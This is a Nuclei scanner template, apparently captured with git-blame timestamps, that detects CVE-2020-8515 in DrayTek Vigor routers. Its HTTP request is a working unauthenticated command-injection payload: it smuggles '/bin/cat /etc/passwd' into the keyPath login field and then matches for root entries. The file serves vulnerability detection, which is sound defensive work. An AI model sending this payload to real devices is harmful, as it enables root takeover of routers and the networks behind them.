2021-01-28 15:30:20 +00:00
id : CVE-2020-8515
info :
2022-04-29 19:58:07 +00:00
name : DrayTek - Remote Code Execution
2021-01-28 15:30:20 +00:00
author : pikpikcu
severity : critical
2022-05-17 09:18:12 +00:00
description : DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network.
2023-09-06 12:22:36 +00:00
remediation : This issue has been fixed in Vigor3900/2960/300B v1.5.1.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 06:56:49 +00:00
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
- https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8515
2022-05-17 09:18:12 +00:00
- https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
2023-11-08 06:56:05 +00:00
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-%28cve-2020-8515%29/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8515
cwe-id : CWE-78
2024-01-14 13:49:27 +00:00
epss-score : 0.97079
2024-05-31 19:23:20 +00:00
epss-percentile : 0.9977
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : draytek
product : vigor2960_firmware
2023-12-05 09:50:33 +00:00
tags : cve,cve2020,rce,kev,draytek
2021-01-28 15:30:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-28 15:30:20 +00:00
- raw :
- |
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host : {{Hostname}}
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
matchers-condition : and
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2021-01-28 15:30:20 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-01-28 18:53:43 +00:00
- type : status
status :
2022-04-29 19:58:07 +00:00
- 200
2024-06-01 06:53:00 +00:00
# digest: 4b0a00483046022100bc8898ae7a0980f4243804b7ff22a9b8ff38f04d83718dccf79985b33619939b022100dd4fee008abfab68aef6ab24b8f04ea785c96f5ab20dd884b031316f2aef002f:922c64590222798bb761d5b6d8e72950